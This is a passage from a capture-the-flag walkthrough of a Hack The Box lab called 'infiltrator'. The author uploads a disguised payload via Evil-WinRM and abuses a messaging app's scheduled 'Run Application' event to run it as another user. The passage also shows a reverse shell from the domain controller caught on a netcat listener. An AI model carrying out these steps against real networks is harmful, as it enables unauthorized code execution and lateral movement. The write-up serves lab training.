o.martinez
It is suspected that created events are actually being executed. Given that there is a Run Application action, I might be able to get code execution on the dc01.infiltrator.htb host.
*Evil-WinRM* PS C:\> mkdir tmp ; cd tmp
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/3/2024 12:25 PM tmp
*Evil-WinRM* PS C:\tmp> upload explorer.exe .
Info: Uploading /home/kali/archive/htb/labs/infiltrator/explorer.exe to C:\tmp\.
Data: 9556 bytes of 9556 bytes copied
Info: Upload successful!
Created a directory C:\tmp and placed the payload.
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> cmd /c time /t
12:51 PM
Checking the time as well.
Setting up a new event to execute the planted payload at 13:00.
It throws an error that the file doesn't exist.
I would need to create a file on the Windows machine just to get past this error. The o.martinez user would then log in to the Output Messenger application from the dc01.infiltrator.htb host.
PS C:\> mkdir tmp ; cd tmp ; echo blah > explorer.exe
So I created the same environment, C:\tmp\explorer.exe, and saved.
I also logged out so that the o.martinez user can log back in from the dc01.infiltrator.htb host.
Logged back in as the k.turner user to observe.
The o.martinez user is online.
*Evil-WinRM* PS C:\tmp> cmd /c time /t
12:57 PM
It should run the application in 3 minutes.
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ nnc 7777
listening on [any] 7777 ...
connect to [10.10.15.34] from (UNKNOWN) [10.129.60.111] 54233
Microsoft Windows [Version 10.0.17763.6189]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
whoami
infiltrator\o.martinez
C:\Windows\system32> hostname
hostname
dc01
C:\Windows\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.60.111
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
Lateral movement made to the o.martinez user.